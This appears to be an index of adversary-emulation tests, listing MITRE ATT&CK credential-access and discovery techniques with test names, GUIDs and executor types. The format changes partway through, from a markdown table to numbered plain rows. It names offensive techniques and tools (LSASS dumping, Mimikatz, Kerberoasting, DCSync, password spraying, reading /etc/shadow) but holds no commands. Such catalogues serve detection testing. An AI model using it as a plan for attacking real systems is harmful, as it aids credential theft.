| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 8 | Dump LSASS.exe Memory using Out-Minidump.ps1 | 6502c8f0-b775-4dbd-9193-1298f56b6781 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 9 | Create Mini Dump of LSASS.exe using ProcDump | 7cede33f-0acd-44ef-9774-15511300b24b | command_prompt |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 10 | Powershell Mimikatz | 66fb0bc1-3c3f-47e9-a298-550ecfefacbc | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 11 | Dump LSASS with createdump.exe from .Net v5 | 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 | powershell |
| credential-access | T1003.001 | OS Credential Dumping: LSASS Memory | 12 | Dump LSASS.exe using imported Microsoft DLLs | 86fc3f40-237f-4701-b155-81c01c48d697 | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 1 | Password Spray all Domain Users | 90bc2e54-6c84-47a5-9439-0a2a92b4b175 | command_prompt |
| credential-access | T1110.003 | Brute Force: Password Spraying | 2 | Password Spray (DomainPasswordSpray) | 263ae743-515f-4786-ac7d-41ef3a0d4b2b | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 3 | Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) | f14d956a-5b6e-4a93-847f-0c415142f07d | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 4 | Password spray all Azure AD users with a single password | a8aa2d3e-1c52-4016-bc73-0f8854cfa80a | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 5 | WinPwn - DomainPasswordSpray Attacks | 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 6 | Password Spray Invoke-DomainPasswordSpray Light | b15bc9a5-a4f3-4879-9304-ea0011ace63a | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 7 | Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) | f3a10056-0160-4785-8744-d9bd7c12dc39 | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 8 | Password Spray using Kerbrute Tool | c6f25ec3-6475-47a9-b75d-09ac593c5ecb | powershell |
| credential-access | T1110.003 | Brute Force: Password Spraying | 9 | AWS - Password Spray an AWS using GoAWSConsoleSpray | 9c10d16b-20b1-403a-8e67-50ef7117ed4e | sh |
| credential-access | T1003.005 | OS Credential Dumping: Cached Domain Credentials | 1 | Cached Credential Dump via Cmdkey | 56506854-89d6-46a3-9804-b7fde90791f9 | command_prompt |
| credential-access | T1558.001 | Steal or Forge Kerberos Tickets: Golden Ticket | 1 | Crafting Active Directory golden tickets with mimikatz | 9726592a-dabc-4d4d-81cd-44070008b3af | powershell |
| credential-access | T1558.001 | Steal or Forge Kerberos Tickets: Golden Ticket | 2 | Crafting Active Directory golden tickets with Rubeus | e42d33cd-205c-4acf-ab59-a9f38f6bad9c | powershell |
| credential-access | T1649 | Steal or Forge Authentication Certificates | 1 | Staging Local Certificates via Export-Certificate | eb121494-82d1-4148-9e2b-e624e03fbf3d | powershell |
| credential-access | T1552.003 | Unsecured Credentials: Bash History | 1 | Search Through Bash History | 3cfde62b-7c33-4b26-a61e-755d6131c8ce | sh |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 1 | Find AWS credentials | 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 | sh |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 2 | Extract Browser and System credentials with LaZagne | 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 | bash |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 3 | Extract passwords with grep | bd4cf0d1-7646-474e-8610-78ccf5a097c4 | sh |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 4 | Extracting passwords with findstr | 0e56bf29-ff49-4ea5-9af4-3b81283fd513 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 5 | Access unattend.xml | 367d4004-5fc0-446d-823f-960c74ae52c3 | command_prompt |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 6 | Find and Access Github Credentials | da4f751a-020b-40d7-b9ff-d433b7799803 | bash |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 7 | WinPwn - sensitivefiles | 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 8 | WinPwn - Snaffler | fdd0c913-714b-4c13-b40f-1824d6c015f2 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 9 | WinPwn - powershellsensitive | 75f66e03-37d3-4704-9520-3210efbe33ce | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 10 | WinPwn - passhunt | 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 11 | WinPwn - SessionGopher | c9dc9de3-f961-4284-bd2d-f959c9f9fda5 | powershell |
| credential-access | T1552.001 | Unsecured Credentials: Credentials In Files | 12 | WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials | aaa87b0e-5232-4649-ae5c-f1724a4b2798 | powershell |
1296 credential-access T1528 Steal Application Access Token 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1297 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1298 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1299 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1300 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1301 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
1302 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
1303 credential-access T1110.004 Brute Force: Credential Stuffing 3 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
1304 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
1305 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
1306 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
1307 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
1308 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
1309 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
1310 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1311 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1312 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
1313 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1314 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1315 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1316 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
1317 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
1318 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
1319 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1320 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1321 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1322 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1323 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1324 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
1325 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
1326 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
1327 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
1328 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
1329 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
1330 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1331 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
1332 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
1333 credential-access T1552.007 Kubernetes List Secrets 3 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
1334 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
1335 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
1336 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
1337 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
1338 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
1339 discovery T1033 System Owner/User Discovery 6 System Discovery - SocGholish whoami 3d257a03-eb80-41c5-b744-bb37ac7f65c7 powershell
1340 discovery T1613 Container and Resource Discovery 1 Container and ResourceDiscovery 8a895923-f99f-4668-acf2-6cc59a44f05e sh
1341 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
1342 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
1343 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
1344 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1345 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1346 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1347 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1348 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
1349 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
1350 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
1351 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
1352 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
1353 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
1354 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
1355 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
1356 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
1357 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
1358 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
1359 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
1360 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
1361 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
1362 discovery T1087.002 Account Discovery: Domain Account 17 Wevtutil - Discover NTLM Users Remote b8a563d4-a836-4993-a74e-0a19b8481bfe powershell
1363 discovery T1087.002 Account Discovery: Domain Account 18 Suspicious LAPS Attributes Query with Get-ADComputer all properties 394012d9-2164-4d4f-b9e5-acf30ba933fe powershell
1364 discovery T1087.002 Account Discovery: Domain Account 19 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property 6e85bdf9-7bc4-4259-ac0f-f0cb39964443 powershell
1365 discovery T1087.002 Account Discovery: Domain Account 20 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope ffbcfd62-15d6-4989-a21a-80bfc8e58bb5 powershell
1366 discovery T1087.002 Account Discovery: Domain Account 21 Suspicious LAPS Attributes Query with adfind all properties abf00f6c-9983-4d9a-afbc-6b1c6c6448e1 powershell
1367 discovery T1087.002 Account Discovery: Domain Account 22 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd 51a98f96-0269-4e09-a10f-e307779a8b05 powershell
1368 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
1369 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
1370 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
1371 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
1372 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
1373 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
1374 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
1375 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
1376 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
1377 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
1378 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
1379 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
1380 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
1381 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
1382 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
1383 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
1384 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
1385 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
1386 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
1387 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
1388 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
1389 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
1390 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
1391 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
1392 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
1393 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
1394 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
1395 discovery T1069.002 Permission Groups Discovery: Domain Groups 14 Active Directory Enumeration with LDIFDE 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 command_prompt
1396 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1397 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1398 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1399 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1400 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1401 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1402 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1403 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1404 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1405 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1406 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1407 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1408 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1409 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1410 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1411 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
1412 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
1413 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
1414 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
1415 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
1416 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
1417 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
1418 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
1419 discovery T1135 Network Share Discovery 9 Network Share Discovery via dir command 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 command_prompt
1420 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
1421 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
1422 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
1423 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
1424 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
1425 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
1426 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
1427 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
1428 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
1429 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
1430 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
1431 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
1432 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
1433 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
1434 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
1435 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
1436 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
1437 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
1438 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
1439 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
1440 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
1441 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
1442 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
1443 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
1444 discovery T1082 System Information Discovery 23 Azure Security Scan with SkyArk 26a18d3d-f8bc-486b-9a33-d6df5d78a594 powershell
1445 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
1446 discovery T1082 System Information Discovery 25 System Information Discovery with WMIC 8851b73a-3624-4bf7-8704-aa312411565c command_prompt
1447 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
1448 discovery T1580 Cloud Infrastructure Discovery 1 AWS - EC2 Enumeration from Cloud Instance 99ee161b-dcb1-4276-8ecb-7cfdcb207820 sh
1449 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
1450 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
1451 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
1452 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
1453 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
1454 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
1455 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
1456 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
1457 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
1458 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
1459 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
